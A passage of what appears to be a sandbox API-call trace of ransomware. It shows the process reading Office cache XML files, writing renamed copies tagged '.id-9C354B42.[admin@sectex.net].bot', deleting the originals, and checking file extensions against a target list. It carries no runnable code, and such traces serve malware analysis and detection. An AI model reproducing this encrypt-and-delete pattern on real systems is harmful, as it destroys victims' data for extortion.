	[0033.731] ReadFile (in: hFile=0x18c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x567, lpOverlapped=0x0) returned 1
	[0033.953] WriteFile (in: hFile=0x180, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0x570, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0x570, lpOverlapped=0x0) returned 1
	[0033.954] ReadFile (in: hFile=0x18c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0033.954] WriteFile (in: hFile=0x180, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xf2, lpOverlapped=0x0) returned 1
	[0033.954] SetEndOfFile (hFile=0x180) returned 1
	[0033.954] CloseHandle (hObject=0x180) returned 1
	[0033.955] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.955] SetEndOfFile (hFile=0x18c) returned 1
	[0033.956] CloseHandle (hObject=0x18c) returned 1
	[0033.956] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0033.956] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml")) returned 1
	[0033.957] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 78
	[0033.957] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 78
	[0033.957] lstrlenW (lpString=".doc") returned 4
	[0033.957] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0033.957] lstrlenW (lpString=".docx") returned 5
	[0033.957] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1
	[0033.957] lstrlenW (lpString=".pdf") returned 4
	[0033.957] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0033.957] lstrlenW (lpString=".xls") returned 4
	[0033.957] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0033.957] lstrlenW (lpString=".xlsx") returned 5
	[0033.957] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1
	[0033.957] lstrlenW (lpString=".ppt") returned 4
	[0033.957] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0033.957] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 78
	[0033.957] lstrlenW (lpString=".zip") returned 4
	[0033.957] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0033.957] lstrlenW (lpString=".rar") returned 4
	[0033.957] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0033.957] lstrlenW (lpString=".bz2") returned 4
	[0033.957] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0033.957] lstrlenW (lpString=".7z") returned 3
	[0033.957] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0033.957] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 78
	[0033.957] lstrlenW (lpString=".dbf") returned 4
	[0033.957] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0033.957] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 78
	[0033.957] lstrlenW (lpString=".1cd") returned 4
	[0033.957] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0033.957] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 78
	[0033.957] lstrlenW (lpString=".jpg") returned 4
	[0033.957] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0033.958] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 78
	[0033.958] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 78
	[0033.958] lstrlenW (lpString=".doc") returned 4
	[0033.958] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0033.958] lstrlenW (lpString=".docx") returned 5
	[0033.958] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1
	[0033.958] lstrlenW (lpString=".pdf") returned 4
	[0033.958] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0033.958] lstrlenW (lpString=".xls") returned 4
	[0033.958] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0033.958] lstrlenW (lpString=".xlsx") returned 5
	[0033.958] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1
	[0033.958] lstrlenW (lpString=".ppt") returned 4
	[0033.958] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0033.958] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 78
	[0033.958] lstrlenW (lpString=".zip") returned 4
	[0033.958] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0033.958] lstrlenW (lpString=".rar") returned 4
	[0033.958] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0033.958] lstrlenW (lpString=".bz2") returned 4
	[0033.958] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0033.958] lstrlenW (lpString=".7z") returned 3
	[0033.958] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0033.958] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 78
	[0033.958] lstrlenW (lpString=".dbf") returned 4
	[0033.958] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0033.958] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 78
	[0033.958] lstrlenW (lpString=".1cd") returned 4
	[0033.958] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0033.958] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 78
	[0033.958] lstrlenW (lpString=".jpg") returned 4
	[0033.958] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0033.958] lstrcmpiW (lpString1=".xml", lpString2=".bot") returned 1
	[0033.959] lstrlenW (lpString="OneNoteMUI.xml") returned 14
	[0033.959] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c
	[0033.959] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=1606) returned 1
	[0033.960] CloseHandle (hObject=0x18c) returned 1
	[0033.960] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml")) returned 0x2020
	[0033.960] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0033.960] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c
	[0033.960] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.960] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.960] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180
	[0033.960] GetLastError () returned 0x0
	[0033.960] ReadFile (in: hFile=0x18c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x646, lpOverlapped=0x0) returned 1
	[0033.962] WriteFile (in: hFile=0x180, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0x650, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0x650, lpOverlapped=0x0) returned 1
	[0033.963] ReadFile (in: hFile=0x18c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0033.963] WriteFile (in: hFile=0x180, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xf0, lpOverlapped=0x0) returned 1
	[0033.963] SetEndOfFile (hFile=0x180) returned 1
	[0033.963] CloseHandle (hObject=0x180) returned 1
	[0033.964] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.964] SetEndOfFile (hFile=0x18c) returned 1
	[0033.965] CloseHandle (hObject=0x18c) returned 1
	[0033.965] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0033.965] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml")) returned 1
	[0033.965] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77
	[0033.965] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77
	[0033.965] lstrlenW (lpString=".doc") returned 4
	[0033.965] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0033.965] lstrlenW (lpString=".docx") returned 5
	[0033.965] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1
	[0033.965] lstrlenW (lpString=".pdf") returned 4
	[0033.965] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0033.965] lstrlenW (lpString=".xls") returned 4
	[0033.965] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0033.965] lstrlenW (lpString=".xlsx") returned 5
	[0033.965] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1
	[0033.965] lstrlenW (lpString=".ppt") returned 4
	[0033.965] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0033.965] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77
	[0033.965] lstrlenW (lpString=".zip") returned 4
	[0033.966] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0033.966] lstrlenW (lpString=".rar") returned 4
	[0033.966] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0033.966] lstrlenW (lpString=".bz2") returned 4
	[0033.966] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0033.966] lstrlenW (lpString=".7z") returned 3
	[0033.966] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0033.966] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77
	[0033.966] lstrlenW (lpString=".dbf") returned 4
	[0033.966] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0033.966] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77
	[0033.966] lstrlenW (lpString=".1cd") returned 4
	[0033.966] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0033.966] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77
	[0033.966] lstrlenW (lpString=".jpg") returned 4
	[0033.966] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0033.966] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77
	[0033.966] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77
	[0033.966] lstrlenW (lpString=".doc") returned 4
	[0033.966] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0033.966] lstrlenW (lpString=".docx") returned 5
	[0033.966] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1
	[0033.966] lstrlenW (lpString=".pdf") returned 4
	[0033.966] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0033.966] lstrlenW (lpString=".xls") returned 4
	[0033.966] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0033.966] lstrlenW (lpString=".xlsx") returned 5
	[0033.966] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1
	[0033.966] lstrlenW (lpString=".ppt") returned 4
	[0033.966] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0033.966] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77
	[0033.966] lstrlenW (lpString=".zip") returned 4
	[0033.966] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0033.966] lstrlenW (lpString=".rar") returned 4
	[0033.966] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0033.967] lstrlenW (lpString=".bz2") returned 4
	[0033.967] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0033.967] lstrlenW (lpString=".7z") returned 3
	[0033.967] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0033.967] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77
	[0033.967] lstrlenW (lpString=".dbf") returned 4
	[0033.967] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0033.967] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77
	[0033.967] lstrlenW (lpString=".1cd") returned 4
	[0033.967] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0033.967] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77
	[0033.967] lstrlenW (lpString=".jpg") returned 4
	[0033.967] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0033.967] lstrcmpiW (lpString1=".xml", lpString2=".bot") returned 1
	[0033.967] lstrlenW (lpString="Setup.xml") returned 9
	[0033.967] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c
	[0033.968] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=1988) returned 1
	[0033.968] CloseHandle (hObject=0x18c) returned 1
	[0033.968] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020
	[0033.969] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0033.969] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c
	[0033.969] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.969] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.969] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180
	[0033.969] GetLastError () returned 0x0
	[0033.969] ReadFile (in: hFile=0x18c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x7c4, lpOverlapped=0x0) returned 1
	[0033.971] WriteFile (in: hFile=0x180, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0x7d0, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0x7d0, lpOverlapped=0x0) returned 1
	[0033.972] ReadFile (in: hFile=0x18c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0033.972] WriteFile (in: hFile=0x180, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0033.972] SetEndOfFile (hFile=0x180) returned 1
	[0033.972] CloseHandle (hObject=0x180) returned 1
	[0033.973] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0033.973] SetEndOfFile (hFile=0x18c) returned 1
	[0033.973] CloseHandle (hObject=0x18c) returned 1
	[0033.974] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0033.974] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1
	[0033.974] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.974] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.974] lstrlenW (lpString=".doc") returned 4
	[0033.974] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0033.974] lstrlenW (lpString=".docx") returned 5
	[0033.974] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1
	[0033.974] lstrlenW (lpString=".pdf") returned 4
	[0033.974] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0033.974] lstrlenW (lpString=".xls") returned 4
	[0033.974] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0033.974] lstrlenW (lpString=".xlsx") returned 5
	[0033.974] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1
	[0033.974] lstrlenW (lpString=".ppt") returned 4
	[0033.974] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0033.974] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.974] lstrlenW (lpString=".zip") returned 4
	[0033.974] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0033.974] lstrlenW (lpString=".rar") returned 4
	[0033.974] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0033.974] lstrlenW (lpString=".bz2") returned 4
	[0033.974] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0033.975] lstrlenW (lpString=".7z") returned 3
	[0033.975] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0033.975] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.975] lstrlenW (lpString=".dbf") returned 4
	[0033.975] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0033.975] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.975] lstrlenW (lpString=".1cd") returned 4
	[0033.975] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0033.975] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.975] lstrlenW (lpString=".jpg") returned 4
	[0033.975] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0033.975] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.975] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.975] lstrlenW (lpString=".doc") returned 4
	[0033.975] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0033.975] lstrlenW (lpString=".docx") returned 5
	[0033.975] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1
	[0033.975] lstrlenW (lpString=".pdf") returned 4
	[0033.975] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0033.975] lstrlenW (lpString=".xls") returned 4
	[0033.975] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0033.975] lstrlenW (lpString=".xlsx") returned 5
	[0033.975] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1
	[0033.975] lstrlenW (lpString=".ppt") returned 4
	[0033.975] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0033.975] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.975] lstrlenW (lpString=".zip") returned 4
	[0033.975] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0033.975] lstrlenW (lpString=".rar") returned 4
	[0033.975] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0033.975] lstrlenW (lpString=".bz2") returned 4
	[0033.975] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0033.975] lstrlenW (lpString=".7z") returned 3
	[0033.976] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0033.976] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.976] lstrlenW (lpString=".dbf") returned 4
	[0033.976] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0033.976] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.976] lstrlenW (lpString=".1cd") returned 4
	[0033.976] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0033.976] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72
	[0033.976] lstrlenW (lpString=".jpg") returned 4
	[0033.976] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0033.976] lstrcmpiW (lpString1=".xml", lpString2=".bot") returned 1
	[0033.976] lstrlenW (lpString="ProjectMUI.xml") returned 14
	[0033.976] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c
	[0033.977] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=1452) returned 1
	[0033.977] CloseHandle (hObject=0x18c) returned 1
	[0033.977] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml")) returned 0x2020
	[0033.978] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0033.978] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c
